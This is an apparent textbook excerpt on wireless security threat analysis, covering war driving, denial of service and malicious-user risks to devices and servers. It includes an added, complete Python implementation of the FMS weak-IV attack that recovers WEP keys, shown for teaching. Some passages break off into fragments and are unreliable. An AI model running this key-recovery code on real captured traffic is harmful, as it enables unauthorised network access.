Vulnerabilities 10
. . . man will occasionally stumble over the truth, but usually manages to pick
himself up, walk over or around it, and carry on.
—Winston S. Churchill
THE SECOND PHASE OF THE I-ADD SECURITY PROCESS is the analyze phase. During this phase you examine known attacks, vulnerabilities, and theoretical attacks in order to generate protections and mitigations. These protections and mitigations are methods or procedures used to inhibit an attacker's ability to exploit a vulnerability or perform an attack. The protections and mitigations should be identified without consideration for other factors, such as cost, limits to functionality, or time to implement. Trade-offs are evaluated and decisions are made during the next I-ADD phase, the define phase.
Known Attacks
Identifying known attacks requires research of security-related Web sites, papers, and trade journals. Although currently known attacks are few in number relative to those against wired systems, they are likely to grow as wireless systems become more prevalent and provide a richer target for the attacker community. The known attacks we cover here are specific to the wireless portions of the system. The Web servers, backend servers, and gateways are all subject to known attacks specific to their hardware platforms, operating systems, and ancillary applications. The importance of examining known attacks separately from theoretical attacks is that known attacks are the ones an attacker is likely to attempt first when targeting a wireless system. Therefore, known attacks deserve a higher priority when making trade-offs during the next I-ADD phase.
188 ANALYZE ATTACKS AND VULNERABILITIES
Device Theft
Device theft is just as it sounds, the physical theft of the device by an attacker. Fortunately, this is not a concept new or unique to wireless devices or systems, so the need to protect wireless devices and systems against physical theft is intuitive to device and system manufacturers. Unfortunately, devising devices or systems that are resistant to theft is very difficult.

Several mitigations can be employed to minimize the threat. We will not spend much time stating the obvious, such as locking and alarming rooms that house equipment.
War Driving
In the 1980s, malicious types began war dialing, calling phone numbers at random in an attempt to locate unprotected modems and gain access to networks. The early 2000s version of war dialing is war driving: roaming around with a laptop, a wireless NIC, and an antenna, attempting to gain access to wireless networks. As we have discussed, the vast majority of wireless networks deployed either do not use WEP at all or use WEP without RSA's Fast Packet Keying solution, which is what makes WEP (more or less) secure. With a $100–150 wireless NIC put into promiscuous (monitor) mode and a cheap parabolic grid antenna from Radio Shack, hackers have gained access to thousands of wireless networks across the United States. In populated areas, war drivers have combined simple GPS applications with the wireless NIC and antenna and have successfully mapped the locations of thousands of wireless networks to which they can gain access. No esoteric software or hardware is required. A software application called AirSnort passively collects the intercepted WEP traffic and, after it has gathered enough frames encrypted under weak initialization vectors, recovers the WEP key itself, which then decrypts every frame on that network.
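The weakness AirSnort exploits, shown here as an added worked example that is not from the book and is not AirSnort's own code: a pure-Python simulation of the Fluhrer, Mantin, and Shamir weak-IV attack on WEP. The 40-bit key (`c0ffee1337`), the frame payload, the "captured" frames, and all function names are constructed for this illustration. The attacker is assumed to know the first plaintext byte of every data frame (the LLC/SNAP header byte 0xAA), which is the assumption the real attack makes, and to confirm a candidate key by checking the CRC-32 integrity check value (ICV) of one captured frame, as AirSnort does.

```python
"""Constructed demonstration of the FMS weak-IV attack on WEP (not the book's or AirSnort's code)."""
import zlib
from collections import Counter

N = 256
SNAP_DSAP = 0xAA   # first plaintext byte of every 802.11 data frame (LLC/SNAP header)


def rc4_keystream(key, length):
    """Textbook RC4: key-scheduling algorithm (KSA), then the output generator (PRGA)."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % N])
    return bytes(out)


def wep_encrypt(secret_key, iv, payload):
    """WEP frame body: IV sent in clear, then RC4(IV || key) applied to payload || CRC-32 ICV."""
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4_keystream(bytes(iv) + secret_key, len(body))
    return bytes(iv), bytes(b ^ k for b, k in zip(body, ks))


def wep_decrypt_ok(secret_key, iv, ciphertext):
    """Decrypt one frame and verify its ICV; this is how a candidate key is confirmed."""
    ks = rc4_keystream(bytes(iv) + secret_key, len(ciphertext))
    body = bytes(c ^ k for c, k in zip(ciphertext, ks))
    return zlib.crc32(body[:-4]).to_bytes(4, "little") == body[-4:]


def partial_ksa(key_prefix):
    """The first len(key_prefix) KSA steps. The attacker can reproduce them because the
    IV is in clear and the earlier secret key bytes have already been recovered."""
    S = list(range(N))
    j = 0
    for i, k in enumerate(key_prefix):
        j = (j + S[i] + k) % N
        S[i], S[j] = S[j], S[i]
    return S, j


def fms_votes(frames, known_secret_prefix):
    """Collect FMS votes for the next secret key byte. With the IV counted as key bytes
    0..2, the byte under attack sits at index a3 = 3 + len(known_secret_prefix)."""
    a3 = 3 + len(known_secret_prefix)
    votes = Counter()
    for iv, ct in frames:
        S, j = partial_ksa(iv + known_secret_prefix)
        x = S[1]
        if not (x < a3 and (x + S[x]) % N == a3):   # FMS "resolved" condition
            continue
        z = ct[0] ^ SNAP_DSAP                        # first keystream byte leaks
        # With probability ~5% the rest of the KSA leaves S[1], S[x], S[a3] alone and
        # then z == S[j_next], so the key byte is j_next - j - S[a3] (mod 256).
        votes[(S.index(z) - j - S[a3]) % N] += 1
    return votes


def fms_recover_key(frames, key_len=5, breadth=3):
    """Depth-first search over the top-`breadth` vote winners per byte; a full
    candidate key is accepted only if it decrypts frames[0] with a valid ICV."""
    iv0, ct0 = frames[0]

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_decrypt_ok(prefix, iv0, ct0) else None
        for k, _ in fms_votes(frames, prefix).most_common(breadth):
            found = search(prefix + bytes([k]))
            if found is not None:
                return found
        return None

    return search(b"")


def capture_weak_iv_frames(secret_key, payload):
    """Constructed capture: one frame per IV of the weak class (A+3, 255, x)."""
    return [wep_encrypt(secret_key, (a + 3, 255, x), payload)
            for a in range(len(secret_key)) for x in range(N)]


WEP_KEY = bytes.fromhex("c0ffee1337")                       # constructed 40-bit key
PAYLOAD = bytes([0xAA, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed payload"

if __name__ == "__main__":
    frames = capture_weak_iv_frames(WEP_KEY, PAYLOAD)
    print("recovered key:", fms_recover_key(frames).hex())
```

Only about 256 IVs per key byte fall in the classic weak class, and only about one in twenty of those actually votes correctly, which is why the real attack needs a long capture and a vote-then-verify loop rather than a single decisive frame. A per-packet key mixing scheme such as RSA's Fast Packet Keying removes the attack's starting point, because the RC4 key no longer begins with bytes the attacker can read off the air.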
Denial of Service
Denial of service is a class of attacks that takes many forms, from subtle to obvious. An obvious denial of service attack against a wireless system would be to sever the coax cable on the tower between the transceiver and the antenna. This definitely would deny service to anyone wanting to use that particular tower. A more subtle attack would be to tie up the system with service requests, or to spread a bogus e-mail such as "New and Destructive Virus," urging recipients to e-mail everyone they know so that they can protect themselves. The desired result is that the system becomes so bogged down with these e-mails that legitimate traffic cannot be accommodated. Another popular denial of service attack is the "Please help, my child is dying" hoax. An e-mail is sent saying that someone, usually a hapless child, is suffering from a terrible affliction. The e-mail goes on to say that a corporation has agreed to donate X amount for every e-mail it receives regarding this child, so please forward this e-mail to everyone you know so that the child can be saved. The desired result is to overwhelm the corporation's servers and cause them to crash.
VULNERABILITIES AND THEORETICAL ATTACKS 189
User Interface
The user interface should be examined in its two parts: the physical interface and access to the user interface. These two have different issues that should be acknowledged for completeness of your risk assessment.
Offline Functions
Malicious User
Personal data is vulnerable to a malicious user who has gained access to the device. Recall that malicious user is a catchall term encompassing a variety of activities. Although this simple statement is adequate for describing the vulnerability, the complexity of the role becomes important and should not be forgotten when generating mitigations and protections or performing the security-functionality trade-offs. For example, a malicious user may pose as a member of one of the legitimate functional roles and become the functional equivalent of one of the malicious roles just discussed.
Online Functions
Personal Data Being Sent
This target is personal data while it is in transit. You will notice that all the previous roles are present, with the addition of a few others because of the data's increased exposure during transport.
Malicious User
Personal data is vulnerable to a malicious user who has access to, or has built, a receiver that can monitor the transmissions of the PDA and can reconstruct the data transmitted and received. Again, a malicious user can assume any of the preceding malicious roles to gain the access necessary to exploit a vulnerability.
distinction separates it from similar activities occurring against the service provider, which we will discuss shortly.
Malicious User
Access to network and online services is vulnerable to a malicious user. A malicious user may gain access to the device and retrieve network and online service credentials, to be used on another device or at a later time. A malicious user may also monitor transmissions, as discussed under "Malicious User" for personal data being sent, to obtain network and online service credentials. Again, a malicious user can assume any of the preceding malicious roles to gain the access necessary to exploit a vulnerability.
Transceiver
The Transceiver Itself
Malicious User
The transceiver is vulnerable to manipulation or modification by a malicious user. For example, this may be done to assist a man-in-the-middle attack.
Malicious User
The transceiver is vulnerable to manipulation or modification by a malicious user. For example, this may be done to deny service to areas or individuals at crucial times.
Malicious User
The transceiver is vulnerable to manipulation or modification by a malicious user. For example, a malicious user may obtain access credentials to utilize the service without paying for the privilege.
For example, service provider subscribers receive stock quotes as part of their service plan. OMS personnel with access to the quote server that provides this service could alter the server to deliver anything in addition to, or in place of, the stock quotes.
Malicious User
The service provider is vulnerable to malicious users gaining network access that allows them to reach the service provider's subscribers, either by these malicious users' acting in one of the preceding roles or by exploiting a vulnerability in the overall service provider's system.
Transceiver
Recall that there were no targets for the transceiver beyond those identified for the higher-level functional block.
Administrative Server
By administrative server, we are referring to the billing, maintenance, and support systems associated with keeping the wireless infrastructure functional.
User-Specific Data
User-specific data is information such as credit card numbers, addresses, financial details, and call and access log information that resides on the administrative server.
Malicious User
User-specific data resident on the administrative server is vulnerable to malicious users' gaining access to the service provider's network and thereby accessing user-specific data. The service provider's network access may be obtained by these malicious users' acting in one of the preceding roles or exploiting a vulnerability in the overall service provider's system.
Malicious User
Corporate proprietary data and resources resident on the administrative server are vulnerable to malicious users gaining access to the service provider's network, and thereby access to corporate proprietary data and resources. The service provider's network access may be obtained by these malicious users' acting in one of the preceding roles or exploiting a vulnerability in the overall service provider's system.
Network Server
User-Specific Data
User-specific data is information such as credit card numbers, addresses, and data such as e-mail and Web traffic that transits the network server.
Malicious User
User-specific data is vulnerable to a malicious user who has access to, or has assumed one of the preceding roles to get access to, the network server.
Malicious User
Corporate proprietary data and resources resident on the network server are vulnerable to malicious users gaining access to the service provider's network, and thereby access to corporate proprietary data and resources. The service provider's network access can be obtained by these malicious users' acting in one of the preceding roles or exploiting a vulnerability in the overall service provider's system.
cover the vulnerabilities for the Web server and backend server. Further, no additional vulnerability is associated with having those servers linked to a wireless system (with the exception of no longer needing physical access) than to a totally wired system.
Malicious User
The gateway is vulnerable to manipulation or modification by a malicious user who has assumed one of the preceding roles or has otherwise gained access to the gateway.
User-Specific Data
Malicious User
User-specific data is vulnerable to a malicious user who has access to, or has assumed one of the preceding roles to get access to, the gateway.
User Data
Malicious User
User data is vulnerable to a malicious user who has access to, or has assumed one of the preceding roles to get access to, the gateway.
Malicious User
Corporate proprietary data and resources are vulnerable to a malicious user who has access to, or has assumed one of the preceding roles to get access to, the gateway.
Malicious User
Third-party data is vulnerable to a malicious user who has access to, or has assumed one of the preceding roles to get access to, the gateway.